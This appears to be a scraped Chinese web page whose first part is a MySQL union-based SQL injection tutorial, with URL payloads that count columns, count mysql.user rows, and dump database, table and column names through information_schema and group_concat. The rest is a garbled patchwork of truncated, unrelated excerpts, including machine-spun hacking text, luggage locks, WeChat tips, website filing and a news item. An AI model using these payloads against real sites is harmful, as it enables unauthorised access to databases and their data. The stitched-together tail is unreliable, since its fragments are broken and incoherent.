利用Information_schema系统库来注入,配合使用group_concat()函数,group_concat()功能强大,而且能够绕过limit限制
http://127.0.0.1/sql.php?id=1 union select 0,0,0 字段为 3
http://127.0.0.1/sql.php?id=1 and 1=2 union select count(*),1,1 from mysql.user 统计数据库中又多少个用户
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata 测试过程中只有 root权限或者 全局权限才能爆出所有数据库 普通用户不能爆出所有用户
这样就把mysql服务器所有数据库名字显示出来了
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x74657374
这样就能把 test 数据库中的 所有表显示出来了。 其中 0x74657374 为 test 的 hex 值
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646D696E
这样就把admin表中所有的字段名 显示出来了。
这样注入手法很灵活的。突破了 limit 限制了。
来看下 穿山甲的注入语句
额~没有登录还不能检查,那就决断注册吧!点击左边的[注册] 菜单进入注册页面,不关键上边的注册,进不去;或 对路由器扫描网站猎手 或许发掘鸡了。 很明显第二个将依据daemon这个权限描述符来回...
现在出远门游玩或者出差,必然会携带行李箱,能将需要用到的物品带在身边,相当方便。把物品整理进行李箱后我们都会给箱子上锁,保障物品不会丢失,但是大家想过一个问题没有,行李箱的密码锁是否真的安全吗?其实不...
操作方式 01 先是打开微信,进入微信后,再选择聊天界面,在聊天列表中选择与联系人的任一对话,按住几秒钟不动直到呈现对话框。 02 按住几秒钟后,会呈现一个对话...
目前网站要备案,几乎所有服务商都要求关闭网站,从提交备案到备案成功的时间少则半个月,多则一个月,对于在搜索引擎中有关键词排名且表现良好的网站来说,关站半个月的损失是相当大的,以前有人推荐使用CDN实现...
一个FTP,两个3389,一个Mysql。 抛开其他不谈,这次只看FTP。 好了,现在开端咱们的无人机绑架之旅。 paperLevel 4 → Level 5101 Options :所以咱们...
新华社北京1月26日电 1月26日,中国共产党中央委员会致电祝贺越南共产党第十三次全国代表大会召开。贺电说: 越共十二大以来,以阮富仲总书记为首的越共中央重视加强党的建设,带领越南人民在推...